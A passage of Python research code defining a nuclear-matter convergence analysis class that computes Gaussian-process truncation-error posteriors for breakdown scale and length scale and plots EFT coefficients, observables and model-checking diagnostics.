self.colors_original_not_excluded = colors_original[excluded_mask_original]
self.orders_original_not_excluded = self.orders_original[excluded_mask_original]
self.markers = markers = np.atleast_1d(markers)
self.markers_not_excluded = markers[excluded_mask]
self.markerfillstyles = markerfillstyles = np.atleast_1d(markerfillstyles)
self.markerfillstyles_not_excluded = markerfillstyles[excluded_mask]
self.linestyles = linestyles = np.atleast_1d(linestyles)
self.linestyles_not_excluded = linestyles[excluded_mask]
self.kwargs = kwargs
def compute_coefficients(self, show_excluded=False, **kwargs):
ratio = self.ratio(self.X, **kwargs)
try:
ref = self.ref(self.X)
except TypeError:
ref = self.ref
c = gm.coefficients(self.y, ratio, ref, self.orders)
if not show_excluded:
c = c[:, self.excluded_mask]
return c
def plot_coefficients(self, *args, **kwargs):
raise NotImplementedError
def plot_pchol(self):
pass
def plot_md_squared(self):
pass
@docstrings.dedent
class MatterConvergenceAnalysis(ConvergenceAnalysis):
"""A convenience class to compute quantities related to nuclear matter convergence
Parameters
----------
%(ConvergenceAnalysis.parameters)s
density : ndarray
system : str
The physical system to consider. Can be 'neutron', 'symmetric', or 'difference'. Affects how to convert
between kf and density, and also the way that files are named.
fit_n2lo : str
The fit number for the NN+3N N2LO potential. Used for naming files.
fit_n3lo : str
The fit number for the NN+3N N3LO potential. Used for naming files.
Lambda : int
The Lambda regulator for the potential. Used for naming files.
body : str
Either 'NN-only' or 'NN+3N'
savefigs : bool, optional
Whether to save figures when plot_* is called. Defaults to `False`
Other Parameters
----------------
%(ConvergenceAnalysis.other_parameters)s
"""
system_strings = dict(
neutron='neutron',
symmetric='symmetric',
difference='difference',
)
system_strings_short = dict(
neutron='n',
symmetric='s',
difference='d',
)
system_math_strings = dict(
neutron='E/N',
symmetric='E/A',
difference='S_2',
)
ratio_map = dict(
kf=ratio_kf
)
MD_label = r'\mathrm{D}_{\mathrm{MD}}^2'
PC_label = r'\mathrm{D}_{\mathrm{PC}}'
CI_label = r'\mathrm{D}_{\mathrm{CI}}'
def __init__(self, X, y2, y3, orders, train, valid, ref2, ref3, ratio, density, *, system='neutron',
fit_n2lo=None, fit_n3lo=None, Lambda=None, body=None, savefigs=False,
fig_path='new_figures', **kwargs):
self.ratio_str = ratio
ratio = self.ratio_map[ratio]
color_list = ['Oranges', 'Greens', 'Blues', 'Reds', 'Purples', 'Greys']
cmaps = [plt.get_cmap(name) for name in color_list[:len(orders)]]
colors = [cmap(0.55 - 0.1 * (i == 0)) for i, cmap in enumerate(cmaps)]
body_vals = ['NN-only', 'NN+3N', '3N', 'Appended']
if body not in body_vals:
raise ValueError(f'body must be in {body_vals}')
# TODO: allow `excluded` to work properly in plots, etc.
super().__init__(
X, y2, y3, orders, train, valid, ref2, ref3, ratio, body=body, colors=colors, **kwargs)
self.system = system
self.fit_n2lo = fit_n2lo
self.fit_n3lo = fit_n3lo
self.Lambda = Lambda
self.body = body
self.savefigs = savefigs
self.fig_path = fig_path
self.system_math_string = self.system_math_strings[system]
self.density = density
self.df_joint = None
self.df_breakdown = None
self.df_ls = None
self.breakdown = None
self.breakdown_min, self.breakdown_max, self.breakdown_num = None, None, None
self.ls_min, self.ls_max, self.ls_num = None, None, None
self._breakdown_map = None
self._ls_map = None
self.ls = None
self.max_idx = None
self.logprior = None
def compute_density(self, kf):
degeneracy = None
if self.system == 'neutron':
degeneracy = 2
elif self.system == 'symmetric':
# print('warning: assuming neutron matter for testing')
# degeneracy = 2
degeneracy = 4
elif self.system == 'difference':
raise ValueError('not sure what to do for symmetry energy')
return nuclear_density(kf, degeneracy)
def compute_momentum(self, density):
degeneracy = None
if self.system == 'neutron':
degeneracy = 2
elif self.system == 'symmetric':
# print('warning: assuming neutron matter for testing')
# degeneracy = 2
degeneracy = 4
elif self.system == 'difference':
raise ValueError('not sure what to do for symmetry energy')
return fermi_momentum(density, degeneracy)
def setup_posteriors(self, max_idx, breakdown_min, breakdown_max, breakdown_num, ls_min, ls_max, ls_num,
logprior=None, max_idx_labels=None):
R"""Computes and stores the values for the breakdown and length scale posteriors.
This must be run before running functions that depend on these posteriors.
Parameters
----------
max_idx : List[int], int
All orders up to self.orders[:max_idx+1] are kept and used to compute posteriors. If a list is provided,
then the posterior is computed for each of the max_indices in the list.
breakdown_min : float
The minimum value for the breakdown scale. Will be used to compute
`np.linspace(breakdown_min, breakdown_max, breakdown_num)`.
breakdown_max : float
The maximum value for the breakdown scale. Will be used to compute
`np.linspace(breakdown_min, breakdown_max, breakdown_num)`.
breakdown_num : int
The number of breakdown scale values to use in the posterior. Will be used to compute
`np.linspace(breakdown_min, breakdown_max, breakdown_num)`.
ls_min : float
The minimum value for the length scale. Will be used to compute
`np.linspace(ls_min, ls_max, ls_num)`. if `ls_min`, `ls_max`, and `ls_num` are all `None`, then
the MAP value of the length scale will be used for the breakdown posterior. No length scale posterior
will be computed in this case.
ls_max : float
The maximum value for the length scale. Will be used to compute
`np.linspace(ls_min, ls_max, ls_num)`. if `ls_min`, `ls_max`, and `ls_num` are all `None`, then
the MAP value of the length scale will be used for the breakdown posterior. No length scale posterior
will be computed in this case.
ls_num : int
The number of length scales to use in the posterior. Will be used to compute
`np.linspace(ls_min, ls_max, ls_num)`. if `ls_min`, `ls_max`, and `ls_num` are all `None`, then
the MAP value of the length scale will be used for the breakdown posterior. No length scale posterior
will be computed in this case.
logprior : ndarray, optional, shape = (ls_num, breakdown_num)
The prior pr(breakdown, ls). If `None`, then a flat prior is used.
Returns
-------
"""
dfs_breakdown = []
dfs_ls = []
dfs_joint = []
self.breakdown_min, self.breakdown_max, self.breakdown_num = breakdown_min, breakdown_max, breakdown_num
self.ls_min, self.ls_max, self.ls_num = ls_min, ls_max, ls_num
breakdown = np.linspace(breakdown_min, breakdown_max, breakdown_num)
if ls_min is None and ls_max is None and ls_num is None:
ls = None
else:
ls = np.linspace(ls_min, ls_max, ls_num)
breakdown_maps = []
ls_maps = []
max_idx = np.atleast_1d(max_idx)
if max_idx_labels is None:
max_idx_labels = max_idx
for idx, idx_label in zip(max_idx, max_idx_labels):
joint_pdf, breakdown_pdf, ls_pdf = self.compute_breakdown_ls_posterior(
breakdown, ls, max_idx=idx, logprior=logprior)
df_breakdown = pd.DataFrame(np.array([breakdown, breakdown_pdf]).T, columns=[r'$\Lambda_b$ [MeV]', 'pdf'])
df_breakdown['Order'] = fr'N$^{idx_label}$LO'
df_breakdown['Order Index'] = idx
df_breakdown['system'] = fr'${self.system_math_string}$'
df_breakdown['Body'] = self.body
dfs_breakdown.append(df_breakdown)
if ls is not None:
df_ls = pd.DataFrame(np.array([ls, ls_pdf]).T, columns=[r'$\ell$ [fm$^{-1}$]', 'pdf'])
df_ls['Order'] = fr'N$^{idx_label}$LO'
df_ls['Order Index'] = idx
df_ls['system'] = fr'${self.system_math_string}$'
df_ls['Body'] = self.body
dfs_ls.append(df_ls)
X = gm.cartesian(ls, breakdown)
df_joint = pd.DataFrame(X, columns=[r'$\ell$ [fm$^{-1}$]', r'$\Lambda_b$ [MeV]'])
df_joint['pdf'] = joint_pdf.ravel()
df_joint['Order'] = fr'N$^{idx_label}$LO'
df_joint['Order Index'] = idx
df_joint['system'] = fr'${self.system_math_string}$'
df_joint['Body'] = self.body
dfs_joint.append(df_joint)
map_idx = np.argmax(joint_pdf)
map_idx = np.unravel_index(map_idx, joint_pdf.shape)
breakdown_maps.append(breakdown[map_idx[1]])
if ls is not None:
ls_maps.append(ls[map_idx[0]])
df_breakdown = pd.concat(dfs_breakdown, ignore_index=True)
df_ls = None
if ls is not None:
df_ls = pd.concat(dfs_ls, ignore_index=True)
df_joint = pd.concat(dfs_joint, ignore_index=True)
self.breakdown = breakdown
self.ls = ls
self.logprior = logprior
self.max_idx = max_idx
self.max_idx_labels = max_idx_labels
self.df_joint = df_joint
self.df_breakdown = df_breakdown
self.df_ls = df_ls
self._breakdown_map = breakdown_maps
self._ls_map = ls_maps
return df_joint, df_breakdown, df_ls
@property
def breakdown_map(self):
return self._breakdown_map
@property
def ls_map(self):
return self._ls_map
def compute_underlying_graphical_diagnostic(self, breakdown, show_excluded=False, interp=False, kernel=None):
coeffs = coeffs_not_excluded = self.compute_coefficients(
breakdown=breakdown, show_excluded=show_excluded
)
colors = self.colors
markerfillstyles = self.markerfillstyles
markers = self.markers
if not show_excluded:
colors = self.colors_not_excluded
markerfillstyles = self.markerfillstyles_not_excluded
markers = self.markers_not_excluded
coeffs_not_excluded = self.compute_coefficients(breakdown=breakdown, show_excluded=False)
gp_kwargs = self.kwargs.copy()
if kernel is not None:
gp_kwargs['kernel'] = kernel
process = gm.ConjugateGaussianProcess(**gp_kwargs)
process.fit(self.X_train, coeffs_not_excluded[self.train]) # in either case, only fit to non-excluded coeffs
if interp:
mean, cov = process.predict(self.X_valid, return_cov=True, pred_noise=True)
# print(mean.shape, mean)
# print(cov)
data = coeffs[self.valid] - mean
mean = np.zeros(len(mean))
else:
mean = process.mean(self.X_valid)
cov = process.cov(self.X_valid)
data = coeffs[self.valid]
# print(mean.shape, mean)
# print(data)
# But it may be useful to visualize the diagnostics off all coefficients
graph = gm.GraphicalDiagnostic(
data, mean, cov, colors=colors, gray=gray, black=softblack,
markerfillstyles=markerfillstyles, markers=markers
)
return graph
def compute_breakdown_ls_posterior(self, breakdown, ls, max_idx=None, logprior=None):
# orders = self.orders[:max_idx + 1]
orders = self.orders
model = gm.TruncationGP(ref=self.ref, ratio=self.ratio, excluded=self.excluded, **self.kwargs)
X = self.X_train
data = self.y_train
joint_pdf, Lb_pdf, ls_pdf = compute_2d_posterior(
model, X, data, orders, breakdown, ls, logprior=logprior, max_idx=max_idx,
)
return joint_pdf, Lb_pdf, ls_pdf
def compute_best_length_scale_for_breakdown(self, breakdown, max_idx):
ord = rf'N$^{max_idx}$LO'
df_best = self.df_joint[
(self.df_joint[r'$\Lambda_b$ [MeV]'] == breakdown) &
(self.df_joint['Order'] == ord)
]
ls_max_idx = df_best['pdf'].idxmax()
return df_best.loc[ls_max_idx][r'$\ell$ [fm$^{-1}$]']
def order_index(self, order):
return np.squeeze(np.argwhere(self.orders == order))
def setup_and_fit_truncation_process(self, breakdown):
model = gm.TruncationGP(
ratio=self.ratio, ref=self.ref, excluded=self.excluded,
ratio_kws=dict(breakdown=breakdown), **self.kwargs
)
# Only update hyperparameters based on train
model.fit(self.X_train, y=self.y_train, orders=self.orders)
return model
def compute_minimum(self, order, n_samples, breakdown=None, X=None, nugget=0, cond=None):
if X is None:
X = self.X
if breakdown is None:
breakdown = self.breakdown_map[-1]
if cond is None:
cond = self.train
x = X.ravel()
# ord = self.orders == order
orders = self.orders_original
# colors = self.colors_original
if self.body == 'NN-only':
y = self.y2
elif self.body == 'NN+3N':
y = self.y3
elif self.body == 'Appended':
y = self.y3
elif self.body == '3N':
y = self.y3
else:
raise ValueError('body not in allowed values')
ord = np.squeeze(np.argwhere(orders == order))
if ord.ndim > 0:
raise ValueError('Found multiple orders that match order')
model = gm.TruncationGP(
ratio=self.ratio, ref=self.ref, excluded=self.excluded,
ratio_kws=dict(breakdown=breakdown), **self.kwargs
)
# Only update hyperparameters based on train
model.fit(self.X_train, y=self.y_train, orders=self.orders)
print(model.coeffs_process.kernel_)
# But then condition on `cond` X, y points to get a good interpolant
pred, cov = model.predict(X, order=order, return_cov=True, Xc=self.X[cond], y=y[cond, ord], kind='both')
if self.body == 'Appended':
try:
ref3_vals = self.ref3(X)
except TypeError:
ref3_vals = self.ref3
try:
ref2_vals = self.ref2(X)
except TypeError:
ref2_vals = self.ref2
ref2_vals = np.atleast_1d(ref2_vals)
ref3_vals = np.atleast_1d(ref3_vals)
# For appended, the standard reference is the 2-body one. So swap for the 3-body ref
cov_3bf = cov * (ref3_vals[:, None] * ref3_vals) / (ref2_vals[:, None] * ref2_vals)
cov = cov + cov_3bf
# pred, cov = model.predict(X, order=order, return_cov=True, kind='both')
# pred += self.y[:, ord]
# cov += np.diag(cov) * nugget * np.eye(cov.shape[0])
x_min, y_min = minimum_samples(pred, (cov + nugget * np.eye(cov.shape[0])), n=n_samples, x=x)
is_endpoint = x_min == X[-1].ravel()
x_min = x_min[~is_endpoint]
y_min = y_min[~is_endpoint]
# Don't interpolate
# min_idx = np.argmin(self.y[:, ord])
# x_min_no_trunc, y_min_no_trunc = self.X.ravel()[min_idx], self.y[min_idx][ord]
# Do interpolate
min_idx = np.argmin(pred)
x_min_no_trunc, y_min_no_trunc = X.ravel()[min_idx], pred[min_idx]
return x_min_no_trunc, y_min_no_trunc, x_min, y_min, pred, cov
def figure_name(self, prefix, breakdown=None, ls=None, max_idx=None, include_system=True):
body = self.body
fit_n2lo = self.fit_n2lo
fit_n3lo = self.fit_n3lo
Lambda = self.Lambda
ref = self.ref
if not include_system:
system = 'x'
else:
system = self.system_strings_short[self.system]
full_name = prefix + f'sys-{system}_{body}'
if body == 'NN+3N' or body == '3N':
full_name += f'_fit-{fit_n2lo}-{fit_n3lo}'
else:
full_name += f'_fit-0-0'
full_name += f'_Lamb-{Lambda:.0f}_Q-{self.ratio_str}'
if isinstance(breakdown, tuple):
full_name += f'_Lb-{breakdown[0]:.0f}-{breakdown[1]:.0f}-{breakdown[2]:.0f}'
elif breakdown is not None:
full_name += f'_Lb-{breakdown:.0f}'
else:
full_name += f'_Lb-x'
if isinstance(ls, tuple):
full_name += f'_ls-{ls[0]:.0f}-{ls[1]:.0f}-{ls[2]:.0f}'
elif ls is not None:
full_name += f'_ls-{ls:.0f}'
else:
full_name += f'_ls-x'
try:
full_name += f'_ref-{ref:.0f}'
except TypeError: # If it's a function
pass
if max_idx is not None:
full_name += f'_midx-{max_idx}'
else:
full_name += f'_midx-x'
center = str(self.kwargs.get('center', 0)).replace('.', 'p')
disp = str(self.kwargs.get('disp', 1)).replace('.', 'p')
df = str(self.kwargs.get('df', 1)).replace('.', 'p')
scale = str(self.kwargs.get('scale', 1)).replace('.', 'p')
full_name += f'_hyp-{center}-{disp}-{df}-{scale}'
full_name = join(self.fig_path, full_name)
return full_name
def model_info(self, breakdown=None, ls=None, max_idx=None):
if breakdown is None:
breakdown = np.NaN
if ls is None:
ls = np.NaN
if max_idx is None:
max_idx = np.NaN
info = dict(
body=self.body,
fit_n2lo=self.fit_n2lo,
fit_n3lo=self.fit_n3lo,
Lambda=self.Lambda,
ref=self.ref,
center=self.kwargs.get('center', 0),
disp=self.kwargs.get('disp', 1),
df=self.kwargs.get('df', 1),
scale=self.kwargs.get('scale', 1),
breakdown=breakdown,
ls=ls,
max_idx=max_idx,
)
return info
def compute_y_label(self):
if self.system == 'neutron':
y_label = fr'Energy per Neutron '
elif self.system == 'symmetric':
y_label = 'Energy per Particle '
elif self.system == 'difference':
y_label = 'Symmetry Energy '
else:
raise ValueError('system has wrong value')
y_label += fr'${self.system_math_strings[self.system]}$'
return y_label
def setup_ticks(self, ax, is_density_primary, train, valid, show_2nd_axis=True, show_train_valid=True):
d_label = r'Density $n$ [fm$^{-3}$]'
kf_label = r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]'
# ax.set_xticks(x_ticks)
# ax2.set_xticks(x_ticks)
x_min, x_max = ax.get_xlim()
if is_density_primary:
x_label = d_label
x = self.density
if show_train_valid:
x_ticks = x[train]
else:
ax.xaxis.set_major_locator(MultipleLocator(0.1))
ax.xaxis.set_minor_locator(AutoMinorLocator(2))
x_ticks = ax.get_xticks()
x_ticks = x_ticks[(x_ticks >= x_min) & (x_ticks <= x_max)]
if show_2nd_axis:
x_label2 = kf_label
x_ticks2 = self.compute_momentum(x_ticks)
# ax.set_xlabel(d_label)
# ax.set_xticks(x_ticks)
# ax.set_xticks(self.density[valid], minor=True)
#
# ax2.plot(x_ticks, ax.get_yticks().mean() * np.ones_like(x_ticks), ls='')
# ax2.set_xlabel(kf_label)
# ax2.set_xticklabels(self.compute_momentum(x_ticks))
else:
x_label = kf_label
x = self.X.ravel()
if show_train_valid:
x_ticks = x[train]
else:
ax.xaxis.set_major_locator(MultipleLocator(0.02))
ax.xaxis.set_minor_locator(AutoMinorLocator(2))
plt.draw()
x_ticks = ax.get_xticks()
x_ticks = x_ticks[(x_ticks >= x_min) & (x_ticks <= x_max)]
if show_2nd_axis:
x_label2 = d_label
x_ticks2 = self.compute_density(x_ticks)
# ax.set_xlabel(kf_label)
# x_ticks = self.X[train].ravel()
# ax.set_xticks(x_ticks)
# ax.set_xticks(self.X[valid].ravel(), minor=True)
#
# ax2.plot(x_ticks, ax.get_yticks().mean() * np.ones_like(x_ticks), ls='')
# ax2.set_xlabel(d_label)
# ax2.set_xticks(x_ticks)
# ax2.set_xticklabels(self.compute_density(x_ticks))
ax.set_xlabel(x_label)
if show_train_valid:
ax.set_xticks(x_ticks)
x_ticks_minor = x[valid]
ax.set_xticks(x_ticks_minor, minor=True)
else:
x_ticks_minor = ax.get_xticks(minor=True)
ax.tick_params(right=True)
y_label = self.compute_y_label()
ax.set_ylabel(y_label)
if show_2nd_axis:
ax2 = ax.twiny()
ax2.margins(*ax.margins()) # Give them same margins, can't change ax.margins after this!
# Plot invisible line to get ticks right
ax2.plot([x_min, x_max], ax.get_yticks().mean() * np.ones(2), ls='')
ax2.set_xlabel(x_label2)
ax2.set_xticks(x_ticks)
ax2.set_xticks(x_ticks_minor, minor=True)
ax2.set_xticklabels([f'{tick:0.2f}' for tick in x_ticks2])
return ax, ax2
return ax
def compute_std_and_kernel(self, breakdown=None):
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
coeffs_not_excluded = self.compute_coefficients(breakdown=breakdown, show_excluded=False)
model = gm.ConjugateGaussianProcess(**self.kwargs)
model.fit(self.X_train, coeffs_not_excluded[self.train])
return np.sqrt(model.cbar_sq_mean_), model.kernel_
def plot_coefficients(self, breakdown=None, ax=None, show_process=False, savefig=None, return_info=False,
show_excluded=False, show_2nd_axis=True, kernel=None, show_train_valid=True, loc='best'):
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
if ax is None:
fig, ax = plt.subplots(figsize=(3.4, 3.4))
kf = self.X.ravel()
density = self.density
train = self.train
if show_process:
coeffs_not_excluded = self.compute_coefficients(breakdown=breakdown, show_excluded=False)
gp_kwargs = self.kwargs.copy()
if kernel is not None:
gp_kwargs['kernel'] = kernel
model = gm.ConjugateGaussianProcess(**gp_kwargs)
model.fit(self.X_train, coeffs_not_excluded[train])
print(model.kernel_)
print('cbar mean:', np.sqrt(model.cbar_sq_mean_))
if show_excluded:
model_all = gm.ConjugateGaussianProcess(**gp_kwargs)
coeffs_all = self.compute_coefficients(breakdown=breakdown, show_excluded=True)
model_all.fit(self.X_train, coeffs_all[train])
pred, std = model_all.predict(self.X, return_std=True)
else:
pred, std = model.predict(self.X, return_std=True)
mu = model.center_
cbar = np.sqrt(model.cbar_sq_mean_)
ax.axhline(mu, 0, 1, lw=1, c='k', zorder=0)
ax.axhline(2*cbar, 0, 1, c=gray, zorder=0)
ax.axhline(-2*cbar, 0, 1, c=gray, zorder=0)
coeffs = self.compute_coefficients(breakdown=breakdown, show_excluded=show_excluded)
colors = self.colors
orders = self.orders
markers = self.markers
markerfillstyles = self.markerfillstyles
if not show_excluded:
colors = self.colors_not_excluded
orders = self.orders_not_excluded
markers = self.markers_not_excluded
markerfillstyles = self.markerfillstyles_not_excluded
light_colors = [lighten_color(c, 0.5) for c in colors]
is_density_primary = True
if is_density_primary:
x = density
else:
x = kf
for i, n in enumerate(orders):
z = i / 20
label = fr'$c_{{{n}}}$'
if self.n_bodies[i] is not None:
label = fr'$c_{{{n}}}^{{({self.n_bodies[i]})}}$'
ax.plot(
x, coeffs[:, i], c=colors[i], label=label, zorder=z,
markevery=train, marker=markers[i], fillstyle=markerfillstyles[i])
# ax.plot(x[train], coeffs[train, i], marker=markers[i], ls='', c=colors[i], zorder=z,
# fillstyle=markerfillstyles[i])
if show_process:
# ax.plot(x, pred[:, i], c=colors[i], zorder=z, ls='--')
ax.fill_between(
x, pred[:, i] + 2*std, pred[:, i] - 2*std, zorder=z,
lw=0.5, alpha=1, facecolor=light_colors[i], edgecolor=colors[i]
)
# ax.axhline(0, 0, 1, ls='--', c=gray, zorder=-1)
# ax2 = ax.twiny()
# ax2.plot(d, np.zeros_like(d), ls='', c=gray, zorder=-1) # Dummy data to set up ticks
# ax2.set_xlabel(r'Density $n$ [fm$^{-3}$]')
# y_label = self.compute_y_label()
# ax.set_ylabel(y_label)
# ax.set_xlabel(r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]')
# ax.set_xticks(self.X_valid.ravel(), minor=True)
if len(orders) > 4:
ax.legend(ncol=3, loc=loc)
else:
ax.legend(ncol=2, loc=loc)
ax.margins(x=0)
self.setup_ticks(
ax, is_density_primary, train=train, valid=self.valid, show_2nd_axis=show_2nd_axis,
show_train_valid=show_train_valid
)
ylim = np.max(np.abs(ax.get_ylim()))
ax.set_ylim(-ylim, ylim)
if savefig is None:
savefig = self.savefigs
if savefig:
fig = plt.gcf()
name = self.figure_name('coeffs', breakdown=breakdown)
fig.savefig(name)
if return_info:
info = self.model_info(breakdown=breakdown)
name = path.relpath(name, self.fig_path)
info['name'] = name
return ax, info
return ax
def plot_observables(self, breakdown=None, ax=None, show_process=False, savefig=None, return_info=False,
show_excluded=False, show_2nd_axis=True, panels=False):
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
if ax is None:
if panels:
fig, axes = plt.subplots(2, 2, figsize=(3.4, 3.4), sharex=True, sharey=True)
else:
fig, ax = plt.subplots(figsize=(3.4, 3.4))
axes = np.atleast_2d(ax)
else:
axes = np.atleast_2d(ax)
for ax in axes.ravel():
ax.margins(x=0.)
kf = self.X.ravel()
is_density_primary = True
if is_density_primary:
x = self.density
else:
x = kf
if show_process:
model = gm.TruncationGP(
ratio=self.ratio, ref=self.ref, excluded=self.excluded,
ratio_kws=dict(breakdown=breakdown), **self.kwargs
)
model.fit(self.X_train, y=self.y_train, orders=self.orders)
if self.body == 'NN-only':
y = self.y2
elif self.body == 'NN+3N':
y = self.y3
elif self.body == 'Appended':
y = self.y3
elif self.body == '3N':
y = self.y3
else:
raise ValueError('body not in allowed values')
# Loop through all orders and throw them out later if needed
orders = self.orders_original
colors = self.colors_original
# if not show_excluded:
# # coeffs = coeffs[:, self.excluded_mask]
# colors = self.colors_original_not_excluded
# orders = self.orders_original_not_excluded
light_colors = [lighten_color(c, 0.5) for c in colors]
print(orders)
for j in range(4):
if panels:
cycle_orders = orders[:j+1]
else:
cycle_orders = orders
if j > 0 and not panels:
break
ax = axes.ravel()[j]
order_labels = []
for i, n in enumerate(cycle_orders):
z = i / 20
if n not in self.orders_not_excluded and not show_excluded:
# Don't plot orders if we've excluded them
continue
order_label = n if n in [0, 1] else n - 1
if order_label == 0:
order_str = 'LO'
elif order_label == 1:
order_str = 'NLO'
else:
order_str = fr'N$^{order_label}$LO'
order_labels.append(order_str)
ax.plot(x, y[:, i], c=colors[i], label=order_str, zorder=z)
# ax.plot(kf[train], self.y[train, i], marker='o', ls='', c=colors[i], zorder=z)
if show_process:
_, std = model.predict(self.X, order=n, return_std=True, kind='trunc')
if self.body == 'Appended':
n_3bf = n if n >= 3 else 3 # 3-body forces don't enter until N3LO
_, std_3bf = model.predict(self.X, order=n_3bf, return_std=True, kind='trunc')
try:
ref3_vals = self.ref3(self.X)
except TypeError:
ref3_vals = self.ref3
try:
ref2_vals = self.ref2(self.X)
except TypeError:
ref2_vals = self.ref2
# For appended, the standard reference is the 2-body one. So swap for the 3-body ref
std_3bf *= ref3_vals / ref2_vals
std = np.sqrt(std**2 + std_3bf**2)
# ax.plot(x, y[:, i], c=colors[i], zorder=z, ls='--')
ax.fill_between(
x, y[:, i] + std, y[:, i] - std, zorder=z,
lw=0.5, alpha=1, facecolor=light_colors[i], edgecolor=colors[i]
)
# ax2.plot(d, self.y[:, 0], ls='', c=gray, zorder=-1) # Dummy data to set up ticks
# ax.axhline(0, 0, 1, ls='--', c=gray, zorder=-1)
# if self.system == 'neutron':
# y_label = fr'Energy per Neutron '
# elif self.system == 'symmetric':
# y_label = 'Energy per Particle '
# elif self.system == 'difference':
# y_label = 'Symmetry Energy '
# else:
# raise ValueError('system has wrong value')
#
# y_label += fr'${self.system_math_strings[self.system]}$'
# y_label = self.compute_y_label()
# ax.set_ylabel(y_label)
# ax.set_xlabel(r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]')
# ax.set_xticks(self.X_valid.ravel(), minor=True)
# if self.system == 'neutron':
# kf_ticks = np.array([1.2, 1.4, 1.6, 1.8])
# elif self.system == 'symmetric':
# kf_ticks = np.array([1., 1.2, 1.4])
# else:
# kf_ticks = np.array([1., 1.2, 1.4])
# ax.set_xticks(kf_ticks)
for ax in axes.ravel():
ax.xaxis.set_major_locator(MultipleLocator(0.2))
# ax2 = ax.twiny()
# ax2.margins(x=0.)
ax.set_xlim(x[0], x[-1])
if self.system == 'symmetric':
self.plot_empirical_saturation(ax, is_density_primary=is_density_primary)
if panels:
# both_axes = self.setup_ticks(
# ax, is_density_primary, train=self.train, valid=self.valid, show_2nd_axis=False)
for ax in axes.ravel():
if is_density_primary:
ax.xaxis.set_major_locator(MultipleLocator(0.1))
else:
ax.xaxis.set_major_locator(MultipleLocator(0.2))
ax.xaxis.set_minor_locator(AutoMinorLocator(2))
ax.yaxis.set_minor_locator(AutoMinorLocator(2))
ax.tick_params(right=True, top=True, which='both')
d_label = r'Density $n$ [fm$^{-3}$]'
axes[1, 0].set_xlabel(d_label)
axes[1, 1].set_xlabel(d_label)
from .graphs import add_top_order_legend
fig = plt.gcf()
dark_colors = [darken_color(color) for color in colors]
add_top_order_legend(fig, axes[0, 0], axes[0, 1], order_labels, colors, light_colors, dark_colors)
else:
ax.legend()
both_axes = self.setup_ticks(
ax, is_density_primary, train=self.train, valid=self.valid, show_2nd_axis=show_2nd_axis)
if show_2nd_axis:
both_axes[-1].set_xlim(x[0], x[-1])
if savefig is None:
savefig = self.savefigs
if savefig:
fig = plt.gcf()
name = self.figure_name('obs_', breakdown=breakdown)
fig.savefig(name)
if return_info:
info = self.model_info(breakdown=breakdown)
info['name'] = path.relpath(name, self.fig_path)
return ax, info
return ax
def plot_joint_breakdown_ls(self, max_idx, return_info=False):
system_str = fr'${self.system_math_string}$'
order_str = fr'N$^{max_idx}$LO'
fig = joint2dplot(self.df_ls, self.df_breakdown, self.df_joint, system=system_str,
order=order_str, data_str=self.system_math_string)
breakdown = (self.breakdown_min, self.breakdown_max, self.breakdown_num)
ls = (self.ls_min, self.ls_max, self.ls_num)
if self.savefigs:
name = self.figure_name('ls-Lb-2d_', breakdown=breakdown, ls=ls, max_idx=max_idx)
fig.savefig(name)
if return_info:
info = self.model_info(max_idx=max_idx)
info['name'] = path.relpath(name, self.fig_path)
return fig, info
return fig
def plot_md_squared(
self, breakdown=None, ax=None, savefig=None, return_info=False, interp=False, kernel=None,
show_excluded=False
):
R"""Plots the squared Mahalanobis distance.
Parameters
----------
breakdown : float, optional
The value for the breakdown scale to use in the diagnostics. If `None`, then its MAP value is used.
ax : matplotlib.axes.Axes, optional
The axis on which to draw the coefficient plots and diagnostics
savefig : bool, optional
Whether to save the figure. If `None`, this is taken from `self.savefigs`.
Returns
-------
ax : matplotlib.axes.Axes
The axis object
"""
if ax is None:
fig, ax = plt.subplots(figsize=(1, 3.2))
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
graph = self.compute_underlying_graphical_diagnostic(
breakdown=breakdown, interp=interp, kernel=kernel, show_excluded=show_excluded)
obs = self.system_math_string
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
ax.margins(y=0)
ax = graph.md_squared(type='box', trim=False, title=None, xlabel=rf'${self.MD_label}({obs})$', ax=ax)
ax.set_xticks([0])
ax.set_xticklabels(['0'], fontdict=dict(color='w'))
ax.tick_params(width=0, axis='x')
# plt.xticklabels()
ymin, ymax = ax.get_ylim()
ax.set_ylim(np.max([np.floor(ymin), 0]), np.ceil(ymax))
if savefig is None:
savefig = self.savefigs
if savefig:
fig = plt.gcf()
name = self.figure_name('md_under_', breakdown=breakdown)
fig.savefig(name)
if return_info:
info = self.model_info(breakdown=breakdown)
info['name'] = path.relpath(name, self.fig_path)
return ax, info
return ax
def plot_pchol(
self, breakdown=None, ax=None, savefig=None, return_info=False, interp=False, kernel=None,
show_excluded=False
):
R"""Plots the pivoted Cholesky diagnostic.
Parameters
----------
breakdown : float, optional
The value for the breakdown scale to use in the diagnostic. If `None`, then its MAP value is used.
ax : matplotlib.axes.Axes, optional
The axis on which to draw the coefficient plots and diagnostics
savefig : bool, optional
Whether to save the figure. If `None`, this is taken from `self.savefigs`.
Returns
-------
ax : matplotlib.axes.Axes
The axis object
"""
if ax is None:
fig, ax = plt.subplots(figsize=(3.2, 3.2))
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
graph = self.compute_underlying_graphical_diagnostic(
breakdown=breakdown, interp=interp, kernel=kernel, show_excluded=show_excluded
)
obs = self.system_math_string
with plt.rc_context({"text.usetex": True, "text.latex.preview": True}):
ax = graph.pivoted_cholesky_errors(ax=ax, title=None)
# ax = graph.individual_errors(ax=ax, title=None)
# ax.text(0.5, 0.95, rf'${self.PC_label}({obs})$', bbox=text_bbox, transform=ax.transAxes, va='top',
# ha='center')
# Hijack a legend to get the 'best' location to place the text
line, = ax.plot([])
# Remove the handle from the legend box.
ax.legend(
[line], [rf'${self.PC_label}({obs})$'], handlelength=0,
loc='best', handletextpad=0)
fig = plt.gcf()
if savefig is None:
savefig = self.savefigs
if savefig:
name = self.figure_name('pc_under_', breakdown=breakdown)
fig.savefig(name)
